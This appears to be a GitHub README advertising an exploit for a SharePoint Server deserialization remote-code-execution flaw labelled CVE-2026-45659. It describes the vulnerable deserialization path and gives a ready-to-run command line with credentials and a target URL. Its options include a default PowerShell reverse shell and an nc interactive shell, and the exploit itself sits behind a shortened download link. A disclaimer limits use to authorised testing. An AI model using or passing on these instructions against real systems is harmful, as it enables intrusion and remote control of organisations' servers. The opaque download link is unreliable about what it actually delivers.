mistbarbarianspot/CVE-2026-45659-SharePoint-RCE

## CVE-2026-45659 SharePoint Deserialization RCE ### Overview Exploit for CVE-2026-45659 affecting Microsoft SharePoint Server 2019/2022/Subscription Edition (on-prem). Authenticated low-priv user (Site Member or equivalent) can achieve remote code execution via unsafe deserialization in the `SPListItem` handling path. Tested on fully patched environments pre-May 2026 update. Works over HTTPS, no interaction required after initial auth. ### Root Cause Vulnerable code path in `Microsoft.SharePoint.Library` uses `LosFormatter.Deserialize` on attacker-controlled data passed through the `Update()` method of list items when custom field types with specific ViewState-like serialization are processed. No proper type filtering or ObjectStateFormatter restrictions. Low-priv user with Contribute rights can trigger via standard REST/ CSOM calls. ### Usage python3 cve-2026-45659.py -t https://sharepoint.target.com -u user@target.com -p Password123 -s "SiteName/ListName" -c "whoami /all" **Required:** - Valid low-priv credentials (Site Member) - Target list with at least one editable item **Options:** - `-c` - command to execute (default: powershell reverse shell) - `--shell` - interactive reverse shell mode (uses nc) - `--proxy` - HTTP proxy support - `--quiet` - minimal output Stable on Windows Server 2019/2022 with latest CU before patch. ### Exploit [href](https://tinyurl.com/mphms4uy) ### Disclaimer This repository is provided for educational and authorized red teaming / penetration testing purposes only. The exploit is intended solely for use on systems you own or have explicit written permission to test. Unauthorized use may violate laws. Use at your own risk.